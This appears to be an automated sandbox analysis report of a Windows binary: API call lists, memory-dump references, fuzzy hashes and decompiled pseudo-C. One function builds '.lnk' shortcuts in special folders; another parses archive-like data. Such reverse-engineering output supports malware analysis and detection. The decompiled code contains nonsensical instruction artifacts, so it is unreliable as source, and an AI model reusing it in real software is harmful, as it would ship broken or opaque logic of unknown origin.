                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AFC
                                          • GetDlgItem.USER32 ref: 00407B33
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407B38
                                          • GetSystemMetrics.USER32 ref: 00407BBA
                                          • GetSystemMetrics.USER32 ref: 00407BC0
                                          • GetSystemMetrics.USER32 ref: 00407BC7
                                          • GetSystemMetrics.USER32 ref: 00407BCE
                                          • GetParent.USER32(?), ref: 00407BF0
                                          • GetClientRect.USER32 ref: 00407C02
                                          • ClientToScreen.USER32(?,?), ref: 00407C15
                                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C7B
                                          • GetDlgItem.USER32 ref: 00407C9A
                                          • SetWindowPos.USER32(00000000), ref: 00407CA1
                                          • GetClientRect.USER32 ref: 00407D21
                                            • Part of subcall function 00407AA0: GetDlgItem.USER32 ref: 00407ABE
                                            • Part of subcall function 00407AA0: SetWindowPos.USER32(00000000), ref: 00407AC5
                                          • ClientToScreen.USER32(?,?), ref: 00407C1E
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                          • GetSystemMetrics.USER32 ref: 00407DA6
                                          • GetSystemMetrics.USER32 ref: 00407DAD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
                                          • String ID:
                                          • API String ID: 2671006076-0
                                          • Opcode ID: ee3a9b64024e76f4bf430920567e8bf6af21306f3b050522a7c71071a4c730ea
                                          • Instruction ID: 79bfce518a1b3777c3be141dac1d4c923f3e13946b8f7072fb596655451fe251
                                          • Opcode Fuzzy Hash: ee3a9b64024e76f4bf430920567e8bf6af21306f3b050522a7c71071a4c730ea
                                          • Instruction Fuzzy Hash: 1FA13BB1E04209AFDB10DFB9CD85AEEBBF9EF48304F144529E615F2291D778E9008B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004047E4, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 263comCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E004047E4(signed short* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v20;
				char _v24;
				char _v36;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v104;
				char _v108;
				char _v120;
				char _v644;
				signed int _t99;
				signed short* _t101;
				signed short* _t106;
				char* _t108;
				void* _t119;
				void* _t125;
				void* _t129;
				char* _t133;
				intOrPtr* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				intOrPtr* _t146;
				intOrPtr* _t148;
				intOrPtr* _t150;
				signed int _t158;
				signed short* _t159;
				signed short* _t164;
				intOrPtr* _t174;
				signed short _t176;
				signed int _t179;
				signed short* _t237;
				void* _t238;

				_t174 = __imp___wtol;
				_t237 = __ecx;
				_t99 =  *__ecx & 0x0000ffff;
				if(_t99 < 0x30 || _t99 > 0x39) {
					_t176 = 0x20;
					_t101 = (_t99 | _t176) - 0x64;
					__eflags = _t101;
					if(_t101 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t16 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t16 & 0xfffffff7) + 0x19;
						__eflags = _t106;
						goto L11;
					}
					_t159 = _t101 - 0xc;
					__eflags = _t159;
					if(_t159 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t12 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t12 & 0xffffffeb) + 0x17;
						goto L11;
					}
					_t164 = _t159 - 3;
					__eflags = _t164;
					if(_t164 == 0) {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t8 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t8 & 0xfffffff5) + 0x16;
						goto L11;
					}
					__eflags = _t164 != 1;
					if(_t164 != 1) {
						goto L37;
					} else {
						__eflags = (_t237[1] | _t176) - 0x75;
						_t4 = (0 | (_t237[1] | _t176) != 0x00000075) - 1; // -1
						_t106 = (_t4 & 0xffffffef) + 0x18;
						goto L11;
					}
				} else {
					_t106 =  *_t174(__ecx);
					L11:
					while(1) {
						_t179 =  *_t237 & 0x0000ffff;
						if(_t179 == 0x2c) {
							break;
						}
						__eflags = _t179;
						if(_t179 == 0) {
							L36:
							L37:
							return 0;
						}
						_t237 =  &(_t237[1]);
						__eflags = _t237;
					}
					_t108 =  &_v644;
					__imp__SHGetSpecialFolderPathW(0, _t108, _t106, 0);
					if(_t108 != 0) {
						E004147DF(E004147DF(E004147DF(E004147DF(E004147DF(E004147DF(E004147DF(E004147DF(E00414803( &_v36,  &_v644),  &_v48),  &_v84),  &_v72),  &_v96),  &_v24),  &_v108),  &_v60),  &_v120);
						_t119 = E004034A3(_t237,  &_v48);
						if(_v44 != 0) {
							_t125 = E004034A3(E004034A3(E004034A3(E004034A3(E004034A3(E004034A3(_t119,  &_v84),  &_v72),  &_v96),  &_v24),  &_v108),  &_v60);
							_t232 =  &_v120;
							E004034A3(_t125,  &_v120);
							_t238 =  *_t174(_v120);
							_t246 = _v20;
							if(_v20 == 0) {
								E00414864( &_v24, _v48 + 2 + E00403813( &_v48, _t246) * 2);
								_t158 = E00414A79( &_v24, 0x2e);
								if(_t158 >= 0) {
									_t232 = _v24;
									_v20 = _t158;
									 *((short*)(_v24 + _t158 * 2)) = 0;
								}
							}
							E00401585( &_v36, 0x5c);
							_t249 = _v68;
							if(_v68 != 0) {
								E00414962( &_v36, _t249,  &_v72);
								E00401585( &_v36, 0x5c);
							}
							_t129 = E0040468A(_v36, _t232);
							_t250 = _t129;
							if(_t129 != 0) {
								E00414962( &_v36, _t250,  &_v24);
								E00414922( &_v36, L".lnk");
								_t133 =  &_v8;
								_v8 = 0;
								__imp__CoCreateInstance(0x41fa64, 0, 1, 0x41fa14, _t133);
								if(_t133 >= 0) {
									_t134 = _v8;
									_v12 = 0;
									 *((intOrPtr*)( *_t134 + 0x50))(_t134, _v48);
									if(_v92 != 0) {
										_t150 = _v8;
										 *((intOrPtr*)( *_t150 + 0x1c))(_t150, _v96);
									}
									if(_v80 != 0) {
										_t148 = _v8;
										 *((intOrPtr*)( *_t148 + 0x2c))(_t148, _v84);
									}
									if(_v104 != 0) {
										_t146 = _v8;
										 *((intOrPtr*)( *_t146 + 0x24))(_t146, _v108);
									}
									if(_v56 != 0) {
										_t144 = _v8;
										 *((intOrPtr*)( *_t144 + 0x44))(_t144, _v60, _t238);
									}
									_t136 = _v8;
									_push( &_v12);
									_push(0x41fa44);
									_push(_t136);
									if( *((intOrPtr*)( *_t136))() >= 0) {
										_t140 = _v12;
										 *((intOrPtr*)( *_t140 + 0x18))(_t140, _v36, 1);
										_t142 = _v12;
										 *((intOrPtr*)( *_t142 + 8))(_t142);
									}
									_t138 = _v8;
									 *((intOrPtr*)( *_t138 + 8))(_t138);
								}
							}
						}
						_push(_v120);
						L0041C160();
						_push(_v60);
						L0041C160();
						_push(_v108);
						L0041C160();
						_push(_v24);
						L0041C160();
						_push(_v96);
						L0041C160();
						_push(_v72);
						L0041C160();
						_push(_v84);
						L0041C160();
						_push(_v48);
						L0041C160();
						_push(_v36);
						L0041C160();
					}
					goto L36;
				}
			}















































                                          0x004047ee
                                          0x004047f5
                                          0x004047f7
                                          0x004047fd
                                          0x0040480f
                                          0x00404812
                                          0x00404812
                                          0x00404815
                                          0x00404882
                                          0x00404889
                                          0x0040488f
                                          0x0040488f
                                          0x00000000
                                          0x0040488f
                                          0x00404817
                                          0x00404817
                                          0x0040481a
                                          0x00404867
                                          0x0040486e
                                          0x00404874
                                          0x00000000
                                          0x00404874
                                          0x0040481c
                                          0x0040481c
                                          0x0040481f
                                          0x0040484c
                                          0x00404853
                                          0x00404859
                                          0x00000000
                                          0x00404859
                                          0x00404821
                                          0x00404822
                                          0x00000000
                                          0x00404828
                                          0x00404831
                                          0x00404838
                                          0x0040483e
                                          0x00000000
                                          0x0040483e
                                          0x00404804
                                          0x00404805
                                          0x00404892
                                          0x004048a3
                                          0x004048a3
                                          0x004048a9
                                          0x00000000
                                          0x00000000
                                          0x00404897
                                          0x0040489a
                                          0x00404aee
                                          0x00404af0
                                          0x00404af4
                                          0x00404af4
                                          0x004048a0
                                          0x004048a0
                                          0x004048a0
                                          0x004048ad
                                          0x004048b5
                                          0x004048bd
                                          0x0040490d
                                          0x00404917
                                          0x0040491f
                                          0x0040495c
                                          0x00404961
                                          0x00404966
                                          0x00404971
                                          0x00404973
                                          0x00404976
                                          0x0040498b
                                          0x00404995
                                          0x0040499c
                                          0x0040499e
                                          0x004049a3
                                          0x004049a6
                                          0x004049a6
                                          0x0040499c
                                          0x004049af
                                          0x004049b4
                                          0x004049b7
                                          0x004049c0
                                          0x004049ca
                                          0x004049ca
                                          0x004049d2
                                          0x004049d7
                                          0x004049d9
                                          0x004049e6
                                          0x004049f3
                                          0x004049f8
                                          0x00404a09
                                          0x00404a0c
                                          0x00404a14
                                          0x00404a1a
                                          0x00404a20
                                          0x00404a26
                                          0x00404a2c
                                          0x00404a2e
                                          0x00404a37
                                          0x00404a37
                                          0x00404a3d
                                          0x00404a3f
                                          0x00404a48
                                          0x00404a48
                                          0x00404a4e
                                          0x00404a50
                                          0x00404a59
                                          0x00404a59
                                          0x00404a5f
                                          0x00404a61
                                          0x00404a6b
                                          0x00404a6b
                                          0x00404a6e
                                          0x00404a76
                                          0x00404a77
                                          0x00404a7c
                                          0x00404a81
                                          0x00404a83
                                          0x00404a8e
                                          0x00404a91
                                          0x00404a97
                                          0x00404a97
                                          0x00404a9a
                                          0x00404aa0
                                          0x00404aa0
                                          0x00404a14
                                          0x004049d9
                                          0x00404aa3
                                          0x00404aa6
                                          0x00404aab
                                          0x00404aae
                                          0x00404ab3
                                          0x00404ab6
                                          0x00404abb
                                          0x00404abe
                                          0x00404ac3
                                          0x00404ac6
                                          0x00404acb
                                          0x00404ace
                                          0x00404ad3
                                          0x00404ad6
                                          0x00404adb
                                          0x00404ade
                                          0x00404ae3
                                          0x00404ae6
                                          0x00404aeb
                                          0x00000000
                                          0x004048bd

                                          APIs
                                          • _wtol.MSVCRT ref: 00404805
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,-0000001A,00000000), ref: 004048B5
                                          • _wtol.MSVCRT(?,?), ref: 0040496E
                                          • CoCreateInstance.OLE32(0041FA64,00000000,00000001,0041FA14,?,.lnk,?,0000005C), ref: 00404A0C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AA6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AAE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AB6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404ABE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AC6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404ACE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AD6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404ADE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404AE6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                          • String ID: .lnk
                                          • API String ID: 408529070-24824748
                                          • Opcode ID: aa159659859cbe8141855a2ff8dd6170e527daad8f81cefefa2808579e599679
                                          • Instruction ID: b36f4cba368feadbd9ca12eb67112cd6990ff22843eba92fdb7d435451052127
                                          • Opcode Fuzzy Hash: aa159659859cbe8141855a2ff8dd6170e527daad8f81cefefa2808579e599679
                                          • Instruction Fuzzy Hash: 8F919079900208ABCF14EFA5CC859EEB7B5AF84704B20453EF512BB1D1EB799E45CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A63E, Relevance: 19.9, APIs: 13, Instructions: 398COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E0041A63E(signed int __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, short _a12, signed int _a16, intOrPtr _a20, char _a24, signed int _a28, signed int _a32, unsigned int _a36, unsigned int _a40, unsigned int _a44, void* _a48, signed int _a52, signed int _a56, unsigned int _a60, unsigned int _a64, unsigned int _a68, signed int _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, signed int _a92, signed int _a96, char _a100, intOrPtr* _a104, signed int _a108, signed int _a112, unsigned int _a116, signed int _a120, signed int _a124) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v92;
				char _v117;
				char _v148;
				intOrPtr _v408;
				void* _v460;
				void* __ebx;
				signed int __edi;
				char* __esi;
				void* __ebp;
				signed int _t472;
				intOrPtr _t473;
				signed int _t479;
				signed int _t480;
				signed int _t485;
				signed int _t486;
				void* _t496;
				void* _t498;
				signed int _t501;
				signed int _t511;
				intOrPtr* _t515;
				signed int _t519;
				signed int _t520;
				signed int _t531;
				intOrPtr* _t534;
				signed int _t535;
				signed int _t536;
				void* _t537;
				void* _t539;
				signed int _t543;
				void* _t547;
				signed int _t549;
				signed int _t561;
				void* _t579;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				intOrPtr* _t584;
				signed int _t585;
				unsigned int _t588;
				signed int _t590;
				signed int _t602;
				signed int _t613;
				void* _t616;
				signed int _t617;
				signed int _t625;
				intOrPtr* _t639;
				intOrPtr _t648;
				unsigned int _t650;
				void* _t652;
				void* _t653;
				intOrPtr* _t660;
				void* _t668;
				signed int _t703;
				void* _t723;
				signed int _t724;
				signed int _t725;
				signed int _t727;
				signed int _t731;
				signed int _t734;
				signed int _t735;
				signed int _t737;
				signed int _t739;
				intOrPtr _t740;
				signed int _t742;
				intOrPtr* _t744;
				intOrPtr* _t745;
				void* _t746;
				signed int _t747;
				intOrPtr* _t749;
				intOrPtr* _t751;
				intOrPtr* _t755;
				intOrPtr* _t756;
				signed int _t758;
				void* _t761;
				void* _t762;
				void* _t765;
				void* _t771;

				_t771 = __eflags;
				_t756 =  &_v92;
				_t762 = _t761 - 0xec;
				_push(_t746);
				_t734 = __ecx;
				_a76 = __ecx;
				E00418988( &_v52);
				_a60 = 0;
				_a64 = 0;
				_a68 = 0;
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a48 = 0;
				_a52 = 0;
				_a56 = 0;
				E0041A533(0, __ecx, __edx, _t746, _t771, 0, _a104,  &_v52,  &_a60,  &_a36);
				_t468 = E00416FE1( &_v148, _t771,  *(_t734 + 0x78) & 0x000000ff);
				_t747 = 0;
				_a84 = 0;
				if(_v48 > 0) {
					while(1) {
						_a80 = E00419A20(_t468, _a108);
						_t472 = ( *( *_t756 + _t747) & 0x000000ff) +  *((intOrPtr*)(_v8 + _t747 * 4));
						_t625 = _v12;
						_t735 =  *(_t625 + _t472 * 8);
						_t473 =  *((intOrPtr*)(_t625 + 4 + _t472 * 8));
						__eflags = _t735 - _t735;
						if(_t735 != _t735) {
							break;
						}
						__eflags = 0 - _t473;
						if(0 != _t473) {
							break;
						} else {
							_t480 = E0040BBD0(_a80, _t735);
							_push(0x14);
							L0041C16C();
							__eflags = _t480;
							if(_t480 == 0) {
								_t747 = 0;
								__eflags = 0;
							} else {
								 *((intOrPtr*)(_t480 + 4)) = 0;
								 *_t480 = 0x41f9e0;
								_t747 = _t480;
							}
							__eflags = _t747;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t747 + 4))(_t747);
							}
							 *((intOrPtr*)(_t747 + 8)) =  *_a80;
							 *((intOrPtr*)(_t747 + 0x10)) = 0;
							 *(_t747 + 0xc) = _t735;
							asm("adc ecx, [ebp+0x64]");
							_t485 = E004171F6( &_v148,  *_a104 + _a96, _t747, __eflags,  *_a76,  *_a104 + _a96,  *((intOrPtr*)(_a104 + 4)),  &_v52, _a84, 0, _t747, 0, 0, _a112, _a116, _a120, _a124);
							_a72 = _t485;
							__eflags = _t485;
							if(_t485 != 0) {
								L17:
								 *((intOrPtr*)( *_t747 + 8))(_t747);
								E00417CCA( &_v148);
								_push(_a48);
								L0041C160();
								_push(_a36);
								L0041C160();
								_push(_a60);
								L0041C160();
								E004185D1( &_v52);
								_t479 = _a72;
								goto L2;
							} else {
								_t486 = E004192B9( &_v40, _a84);
								__eflags = _t486;
								if(_t486 == 0) {
									L14:
									 *((intOrPtr*)( *_t747 + 8))(_t747);
									_a84 = _a84 + 1;
									_t468 = _a84;
									__eflags = _a84 - _v48;
									if(_a84 < _v48) {
										_t747 = _a84;
										continue;
									} else {
										_t734 = _a76;
										goto L1;
									}
								} else {
									_t722 = _t735;
									_a80 = _v28 + _a84 * 4;
									_t496 = E0041BCE0( *_a80, _t722);
									_t639 = _a80;
									__eflags = _t496 -  *_t639;
									if(_t496 !=  *_t639) {
										E00418DE4(_t639, _t735);
										asm("int3");
										_push(_t756);
										_t758 = _t762 - 0x64;
										_t765 = _t762 - 0x90;
										_push(0);
										_push(_t747);
										_t749 = _t639;
										_push(_t735);
										_t498 = E00418FB1( *((intOrPtr*)(_t749 + 0x38)));
										_t613 = _a108;
										__eflags = _t498 - 2;
										if(_t498 != 2) {
											_t737 = 0;
											__eflags = 0;
										} else {
											_t737 = 0;
											__eflags = _t722;
											if(__eflags == 0) {
												E004197F9(_t749, _t722, __eflags, _t613 + 0xe0);
												_t498 = E00418FB1( *((intOrPtr*)(_t749 + 0x38)));
											}
										}
										_a72 = _t737;
										_a76 = _t737;
										_a80 = _t737;
										__eflags = _t498 - 3;
										if(_t498 != 3) {
											L28:
											_a36 = _t737;
											_a40 = _t737;
											_a44 = _t737;
											_v44 = _t737;
											_v40 = _t737;
											_v36 = _t737;
											_v32 = _t737;
											_v28 = _t737;
											_v24 = _t737;
											__eflags = _t498 - 4;
											if(_t498 == 4) {
												__eflags = _t722 - _t737;
												if(__eflags == 0) {
													_t744 = _t613 + 0xf8;
													E0041A533(_t613, _t749, _t722, _t749, __eflags,  &_a72, _t744, _t613,  &_a36,  &_v44);
													 *_t744 =  *_t744 +  *((intOrPtr*)(_t613 + 0xf0));
													asm("adc [edi+0x4], eax");
													_t498 = E00418FB1( *((intOrPtr*)(_t749 + 0x38)));
													_t737 = 0;
													__eflags = 0;
												}
											}
											 *(_t613 + 0x5c) = _t737;
											__eflags = _t498 - 5;
											if(__eflags != 0) {
												L104:
												E00419590(_t613, _t613, _t722, __eflags);
												_push(_v32);
												L0041C160();
												_push(_v44);
												L0041C160();
												_push(_a36);
												L0041C160();
												E0041969C( &_a72);
												_t501 = 0;
												__eflags = 0;
												goto L105;
											} else {
												__eflags = _t722 - _t737;
												if(__eflags == 0) {
													_a108 = E00418FE5( *((intOrPtr*)(_t749 + 0x38)), _t722, _t749, __eflags);
													E00419233(_t613 + 0x58, _t502);
													 *(_t613 + 0x5c) = _a108;
													E00419652(_t613 + 0x108, _t722, 9, _t737);
													E00419652(_t613 + 0x108, _t722, 6, _t737);
													__eflags = _a108 - _t737;
													if(__eflags > 0) {
														__eflags = _v40 - _t737;
														if(__eflags != 0) {
															E00419652(_t613 + 0x108, _t722, 0xa, _t737);
														}
													}
													_t739 = _a108;
													_a60 = 0;
													_a64 = 0;
													_a68 = 0;
													E00419725( &_a60, _t739, __eflags);
													_a24 = 0;
													_a28 = 0;
													_a32 = 0;
													_a48 = 0;
													_a52 = 0;
													_a56 = 0;
													_a124 = 0;
													while(1) {
														L86:
														_t511 = E00418FB1( *((intOrPtr*)(_t749 + 0x38)));
														_t648 =  *((intOrPtr*)(_t749 + 0x38));
														_a92 = _t511;
														__eflags = _t511 | _t722;
														_a96 = _t722;
														if((_t511 | _t722) == 0) {
															break;
														}
														_a84 = E00418FB1(_t648);
														_t514 =  *((intOrPtr*)(_t749 + 0x38));
														_t650 =  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 8));
														_a88 = _t722;
														_t722 = 0;
														__eflags = _a88;
														if(__eflags > 0) {
															L106:
															_t515 = E00418DE4(_t650, _t739);
															asm("cdq");
															asm("stosd");
															asm("stosd");
															_t652 = _t650 + 2;
															_t723 = _t722 + _t652;
															asm("stosd");
															_t653 = _t652 + 1;
															 *((intOrPtr*)(_t723 + 0x41 + _t758 * 4)) =  *((intOrPtr*)(_t723 + 0x41 + _t758 * 4)) + _t515;
															 *0x120041ac =  *0x120041ac + _t653;
															asm("lodsb");
															 *_t739 =  *_t739 + _t723;
															asm("lodsb");
															 *_t515 =  *_t515 + _t515;
															asm("stosd");
															 *((intOrPtr*)(_t749 - 0x54)) =  *((intOrPtr*)(_t749 - 0x54)) + _t723;
															 *((intOrPtr*)(_t749 - 0x54)) =  *((intOrPtr*)(_t749 - 0x54)) + _t723;
															_t616 = _t613 + _t613 + _t723;
															asm("stosd");
															 *_t739 =  *_t739 + _t616;
															asm("lodsb");
															_t660 = _t653 + 7;
															_t356 =  &_v117;
															 *_t356 = _v117 + _t723;
															__eflags =  *_t356;
															_push(_t758);
															_push(_t616);
															_push(_t749);
															_push(_t739);
															_t740 = _v408;
															_t751 = _t660;
															E00418567(_t740);
															 *((intOrPtr*)(_t740 + 0xe8)) =  *((intOrPtr*)(_t751 + 0x40));
															 *((intOrPtr*)(_t740 + 0xec)) =  *((intOrPtr*)(_t751 + 0x44));
															 *(_t740 + 0xe0) =  *((intOrPtr*)(_t751 + 0x56));
															_t617 = 0;
															 *((char*)(_t740 + 0xe1)) =  *((intOrPtr*)(_t751 + 0x57));
															__eflags =  *(_t740 + 0xe0);
															if( *(_t740 + 0xe0) != 0) {
																L123:
																_t519 = 0;
																__eflags = 0;
																goto L124;
															} else {
																_t724 =  *(_t751 + 0x5c);
																_v20 =  *((intOrPtr*)(_t751 + 0x60));
																_v12 =  *((intOrPtr*)(_t751 + 0x64));
																_v8 =  *((intOrPtr*)(_t751 + 0x68));
																_a4 =  *((intOrPtr*)(_t751 + 0x6c));
																asm("adc ecx, ebx");
																_v24 = _t724;
																 *((intOrPtr*)(_t740 + 0xf0)) =  *((intOrPtr*)(_t751 + 0x40)) + 0x20;
																 *((intOrPtr*)(_t740 + 0xf4)) =  *((intOrPtr*)(_t751 + 0x44));
																 *((intOrPtr*)(_t740 + 0x128)) = 0x20;
																 *((intOrPtr*)(_t740 + 0x12c)) = 0;
																 *((char*)(_t740 + 0x130)) = 0;
																__eflags = _v20;
																if(__eflags < 0) {
																	goto L123;
																} else {
																	if(__eflags > 0) {
																		L111:
																		__eflags = _v8 - 0x40000000;
																		if(__eflags > 0) {
																			goto L123;
																		} else {
																			if(__eflags < 0) {
																				L114:
																				_t519 = _v12 | _v8;
																				__eflags = _t519;
																				if(_t519 != 0) {
																					__eflags =  *((intOrPtr*)(_t740 + 0x134)) - _t617;
																					if( *((intOrPtr*)(_t740 + 0x134)) == _t617) {
																						 *((char*)(_t740 + 0x130)) = 1;
																					}
																					asm("adc ecx, ebx");
																					 *((intOrPtr*)(_t751 + 0x70)) =  *((intOrPtr*)(_t751 + 0x70)) + _v12 + 0x20;
																					asm("adc [esi+0x74], ecx");
																					_t531 = _v12 + _t724;
																					_t725 = _v8;
																					asm("adc edx, [ebp-0x10]");
																					_v32 = _t531;
																					asm("adc ecx, ebx");
																					 *((intOrPtr*)(_t740 + 0x128)) = _t531 + 0x20;
																					 *((intOrPtr*)(_t740 + 0x12c)) = _t725;
																					_t668 =  *((intOrPtr*)(_t751 + 0x48)) -  *((intOrPtr*)(_t740 + 0xf0));
																					asm("sbb eax, [edi+0xf4]");
																					__eflags =  *((intOrPtr*)(_t751 + 0x4c)) - _t725;
																					if(__eflags > 0) {
																						L126:
																						_t534 =  *_t751;
																						_t520 =  *((intOrPtr*)( *_t534 + 0x10))(_t534, _v24, _v20, 1, _t617);
																						__eflags = _t520 - _t617;
																						if(_t520 == _t617) {
																							_t535 = _v12;
																							__eflags = _t535 - _t535;
																							if(_t535 != _t535) {
																								L129:
																								_t520 = 0x8007000e;
																							} else {
																								__eflags = _t617 - _v8;
																								if(_t617 == _v8) {
																									_push(_v12);
																									L0041C16C();
																									_v32 = _t535;
																									_t536 = E0041670E(_v12); // executed
																									__eflags = _t536 - _t617;
																									if(_t536 == _t617) {
																										_t727 = _v12;
																										_t672 = _v32;
																										_t537 = E0041BCE0(_v32, _t727);
																										__eflags = _t537 - _a4;
																										if(_t537 != _a4) {
																											L134:
																											E00418DE4(_t672, _t740);
																										}
																										__eflags =  *((intOrPtr*)(_t740 + 0x134)) - _t617;
																										if( *((intOrPtr*)(_t740 + 0x134)) == _t617) {
																											 *((char*)(_t740 + 0x131)) = 1;
																										}
																										_push(_t617);
																										_v20 = _t617;
																										E004192D4( &_v24, _t751, _v32, _v12);
																										_t672 =  *((intOrPtr*)(_t751 + 0x38));
																										_v16 = _t617;
																										_v12 = _t617;
																										_v8 = _t617;
																										_t539 = E00418FB1( *((intOrPtr*)(_t751 + 0x38)));
																										__eflags = _t539 - 1;
																										if(_t539 != 1) {
																											L139:
																											__eflags = _t539 - 0x17;
																											if(_t539 != 0x17) {
																												goto L134;
																											} else {
																												__eflags = _t727 - _t617;
																												if(__eflags != 0) {
																													goto L134;
																												} else {
																													_push(_a20);
																													_push(_a16);
																													_t672 = _t751;
																													_push(_a12);
																													_t543 = E0041A63E(_t751, _t727, __eflags,  *((intOrPtr*)(_t740 + 0xf0)),  *((intOrPtr*)(_t740 + 0xf4)), _t740 + 0x100,  &_v16, _a8);
																													_a4 = _t543;
																													__eflags = _t543 - _t617;
																													if(_t543 == _t617) {
																														__eflags = _v12 - _t617;
																														if(_v12 != _t617) {
																															__eflags = _v12 - 1;
																															if(_v12 > 1) {
																																goto L134;
																															} else {
																																E00418E1D( &_v24);
																																E004192FE(_t751,  *_v16);
																																_t672 =  *((intOrPtr*)(_t751 + 0x38));
																																_t547 = E00418FB1( *((intOrPtr*)(_t751 + 0x38)));
																																__eflags = _t547 - 1;
																																if(_t547 != 1) {
																																	goto L134;
																																} else {
																																	__eflags = _t727 - _t617;
																																	if(_t727 != _t617) {
																																		goto L134;
																																	} else {
																																		goto L148;
																																	}
																																}
																															}
																														} else {
																															E0041969C( &_v16);
																															E00418E1D( &_v24);
																															goto L132;
																														}
																													} else {
																														E0041969C( &_v16);
																														E00418E1D( &_v24);
																														_t617 = _a4;
																														goto L132;
																													}
																												}
																											}
																										} else {
																											__eflags = _t727 - _t617;
																											if(_t727 == _t617) {
																												L148:
																												_push(_a20);
																												 *((char*)(_t740 + 0x130)) = 1;
																												_push(_a16);
																												_push(_a12);
																												 *((intOrPtr*)(_t740 + 0x120)) =  *((intOrPtr*)(_t751 + 0x70));
																												_push(_a8);
																												_t549 =  *(_t751 + 0x74);
																												_push(_t740);
																												 *(_t740 + 0x124) = _t549;
																												L19();
																												E0041969C( &_v16);
																												E00418E1D( &_v24);
																												_push(_v32);
																												L0041C160();
																												_t520 = _t549;
																											} else {
																												goto L139;
																											}
																										}
																									} else {
																										_t617 = _t536;
																										L132:
																										_push(_v32);
																										L0041C160();
																										_t520 = _t617;
																									}
																								} else {
																									goto L129;
																								}
																							}
																						}
																					} else {
																						if(__eflags < 0) {
																							L122:
																							 *((char*)(_t740 + 0x133)) = 1;
																							goto L123;
																						} else {
																							__eflags = _t668 - _v32;
																							if(_t668 >= _v32) {
																								goto L126;
																							} else {
																								goto L122;
																							}
																						}
																					}
																				} else {
																					__eflags = _t724 | _v20;
																					if((_t724 | _v20) != 0) {
																						L124:
																						_t520 = _t519 + 1;
																						__eflags = _t520;
																					} else {
																						 *((char*)(_t740 + 0x130)) = 1;
																					}
																				}
																			} else {
																				__eflags = _v12 - _t617;
																				if(_v12 > _t617) {
																					goto L123;
																				} else {
																					goto L114;
																				}
																			}
																		}
																	} else {
																		__eflags = _t724;
																		if(_t724 < 0) {
																			goto L123;
																		} else {
																			goto L111;
																		}
																	}
																}
															}
															return _t520;
														} else {
															if(__eflags < 0) {
																L40:
																_push(1);
																_a4 = _t722;
																E004192D4(_t758, _t749,  *((intOrPtr*)(_t514 + 8)) +  *_t514, _a84);
																_t739 = 0;
																__eflags = _a96;
																if(__eflags > 0) {
																	L83:
																	 *((char*)(_t613 + 0x135)) = 1;
																	 *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 4));
																	goto L84;
																} else {
																	if(__eflags < 0) {
																		L43:
																		_t561 = _a92 + 0xfffffff2;
																		__eflags = _t561 - 0xb;
																		if(__eflags > 0) {
																			goto L83;
